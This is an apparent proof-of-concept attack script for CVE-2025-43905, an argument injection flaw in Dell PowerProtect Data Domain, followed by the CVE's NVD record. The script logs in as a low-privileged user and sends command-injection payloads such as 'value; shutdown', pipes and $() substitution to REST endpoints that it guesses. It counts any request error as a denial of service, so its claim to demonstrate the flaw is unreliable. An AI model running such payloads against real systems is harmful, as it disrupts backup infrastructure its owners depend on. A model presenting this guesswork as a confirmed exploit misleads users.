CVE-2025-43905

# CVE-2025-43905 - Dell PowerProtect Data Domain Argument Injection PoC # Vulnerability: Improper Neutralization of Argument Delimiters in a Command # Impact: Denial of Service (DoS) # Requirement: Low-privileged remote access import requests import socket import sys TARGET_HOST = "<target_ip>" TARGET_PORT = 443 # Default management port USERNAME = "low_priv_user" PASSWORD = "password123" class ArgumentInjectionExploit: def __init__(self, host, port, username, password): self.host = host self.port = port self.username = username self.password = password self.session = requests.Session() def authenticate(self): """Authenticate to DD OS with low-privileged credentials""" login_url = f"https://{self.host}:{self.port}/rest/v1.0/auth" auth_data = { "username": self.username, "password": self.password } try: resp = self.session.post(login_url, json=auth_data, verify=False) if resp.status_code == 200: print("[+] Authentication successful") return True except Exception as e: print(f"[-] Auth error: {e}") return False def inject_argument_delimiters(self, command_endpoint, params): """ Inject argument delimiters (e.g., spaces, semicolons, newlines) into command parameters to trigger argument injection """ # Craft payload with delimiter injection delimiter_payloads = [ "value; shutdown", # Command separator injection "value -invalid_flag", # Flag injection "value\nmalicious_cmd", # Newline injection "value && malicious_cmd", # AND operator injection "value | malicious_cmd", # Pipe injection "value `malicious_cmd`", # Backtick injection "value $(malicious_cmd)", # Command substitution ] for payload in delimiter_payloads: url = f"https://{self.host}:{self.port}/rest/v1.0/{command_endpoint}" data = {**params, "param": payload} try: resp = self.session.post(url, json=data, verify=False) print(f"[*] Sent payload: {payload[:50]}... Status: {resp.status_code}") except Exception as e: print(f"[+] Possible DoS triggered: {e}") return True return False def exploit(self): if not self.authenticate(): print("[-] Exploitation failed: cannot authenticate") return # Target command endpoints that may be vulnerable to argument injection target_endpoints = [ ("system/exec", {"cmd": "status"}), ("filesystems/expand", {"name": "test"}), ("admin/diagnostics", {"action": "run"}), ] for endpoint, params in target_endpoints: print(f"[*] Targeting endpoint: {endpoint}") if self.inject_argument_delimiters(endpoint, params): print(f"[+] DoS achieved on {endpoint}") break if __name__ == "__main__": exploit = ArgumentInjectionExploit(TARGET_HOST, TARGET_PORT, USERNAME, PASSWORD) exploit.exploit()

{"cve": {"id": "CVE-2025-43905", "sourceIdentifier": "[email protected]", "published": "2025-10-07T19:15:37.127", "lastModified": "2025-10-14T20:10:45.223", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.3.0.15, LTS2025 release version 8.3.1.0, LTS2024 release versions 7.13.1.0 through 7.13.1.30, LTS 2023 release versions 7.10.1.0 through 7.10.1.60, contain an Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Denial of service."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-88"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.7.1.0", "versionEndExcluding": "7.10.1.70", "matchCriteriaId": "7FCE50EA-F2B8-4455-A489-1947B0CBFEEA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.13.1.0", "versionEndExcluding": "7.13.1.40", "matchCriteriaId": "C0EA46C5-6776-411A-8FBC-5B32BC216888"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.3.0.0", "versionEndIncluding": "8.3.0.15", "matchCriteriaId": "F1DB489A-E2CF-4477-A08B-101B569A714E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.3.1.0", "versionEndExcluding": "8.3.1.10", "matchCriteriaId": "9E0743E3-14E7-4FF9-88C5-E038D62F2344"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000376224/dsa-2025-333-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}